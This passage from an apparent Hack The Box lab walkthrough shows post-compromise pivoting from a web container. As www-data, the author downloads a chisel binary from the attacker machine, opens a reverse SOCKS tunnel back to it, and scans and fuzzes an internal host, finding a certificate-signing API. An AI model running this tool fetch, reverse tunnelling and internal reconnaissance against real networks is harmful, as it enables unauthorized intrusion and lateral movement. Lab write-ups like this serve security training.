Pivoting
www-data@itrc:/var/www/itrc$ arp -a
resource-db.docker_resource (172.223.0.2) at 02:42:ac:df:00:02 [ether] on eth0
signserv.ssg.htb (172.223.0.1) at 02:42:1a:4b:20:23 [ether] on eth0As enumerated initially, there are 2 ARP records for 2 different hosts;
resource-db.docker_resource (172.223.0.2)signserv.ssg.htb (172.223.0.1)
The /etc/hosts file on Kali has been updated
The resource-db.docker_resource host has been identified to be hosting a MySQL instance connected to the web application. The signserv.ssg.htb host, on the other hand, appears to be the overhead host. I will attempt to reach the signserv.ssg.htb host through a reverse socks proxy.
Reverse Socks Proxy
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ chisel server -p 55555 --reverse -v
2024/08/04 17:39:43 server: Reverse tunnelling enabled
2024/08/04 17:39:43 server: Fingerprint +aYJfVB25rs2TdxTj5i49tVHw5M3vpFfBEVkYlek4+A=
2024/08/04 17:39:43 server: Listening on http://0.0.0.0:55555Starting a Chisel server on the Kali port 55555
www-data@itrc:/var/tmp$ wget http://10.10.14.172/chiselx64 && chmod 755 ./chiselx64
--2024-08-04 15:43:21-- http://10.10.14.172/chiselx64
Connecting to 10.10.14.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8077312 (7.7M) [application/octet-stream]
Saving to: 'chiselx64'
chiselx64 100%[===================>] 7.70M 475KB/s in 14s
2024-08-04 15:43:35 (549 KB/s) - 'chiselx64' saved [8077312/8077312]Delivery complete
From Kali, I need append the configured reverse socks proxy at the bottom of the /etc/proxychains4.conf file
www-data@itrc:/var/tmp$ ./chiselx64 client 10.10.14.172:55555 R:48823:socks &
[1] 296
2024/08/04 15:45:58 client: Connecting to ws://10.10.14.172:55555
2024/08/04 15:46:00 client: Connected (Latency 240.344114ms)
www-data@itrc:/var/tmp$The command above will bind the port 48823 of the Docker host to the Kali’s socks proxy, effectively creating a reverse socks proxy
Connected
Scanning
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ proxychains4 -q nmap 172.223.0.1
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-04 18:04 CEST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.90% done
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.90% done; ETC: 18:08 (0:03:27 remaining)
Nmap scan report for syn-172-223-000-001.res.spectrum.com (172.223.0.1)
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 258.51 secondsSame result
Web
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ proxychains4 -q curl -i http://signserv.ssg.htb/
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 04 Aug 2024 15:57:07 GMT
Content-Type: application/json
Content-Length: 22
Connection: keep-alive
{"detail":"Not Found"} 
It would appear that the web server on the signserv.ssg.htb host features possible API endpoints
Fuzzing
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ ffuf -x socks5://127.0.0.1:48823 -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -t 200 -u http://signserv.ssg.htb/FUZZ -ic
________________________________________________
:: Method : GET
:: URL : http://signserv.ssg.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Proxy : socks5://127.0.0.1:48823
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
docs [Status: 200, Size: 939, Words: 150, Lines: 31, Duration: 1531ms]
:: Progress: [20476/20476] :: Job [1/1] :: 92 req/sec :: Duration: [0:04:12] :: Errors: 86 ::ffuf found /docs
FastAPI + Swagger UI
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ proxychains4 -q curl -i http://signserv.ssg.htb/docs
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 04 Aug 2024 15:59:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 939
Connection: keep-alive
<!DOCTYPE html>
<html>
<head>
<link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/swagger-ui-dist@5.9.0/swagger-ui.css">
<link rel="shortcut icon" href="https://fastapi.tiangolo.com/img/favicon.png">
<title>FastAPI - Swagger UI</title>
</head>
<body>
<div id="swagger-ui">
</div>
<script src="https://cdn.jsdelivr.net/npm/swagger-ui-dist@5.9.0/swagger-ui-bundle.js"></script>
<!-- `SwaggerUIBundle` is now available on the page -->
<script>
const ui = SwaggerUIBundle({
url: '/openapi.json',
"dom_id": "#swagger-ui",
"layout": "BaseLayout",
"deepLinking": true,
"showExtensions": true,
"showCommonExtensions": true,
oauth2RedirectUrl: window.location.origin + '/docs/oauth2-redirect',
presets: [
SwaggerUIBundle.presets.apis,
SwaggerUIBundle.SwaggerUIStandalonePreset
],
})
</script>
</body>
</html>It’s hosting FastAPI with a Swagger UI It might be unnecessary to continue with proxychains4, as it is likely that there already is an overhead reverse proxy provided by nginx
As expected, there is an nginx overhead reverse proxy
There is a single API endpoint for signing certificate; /v1/sign
Sign Certificate
This appears to be a feature to literally sign a certificate. But it requires an authorization header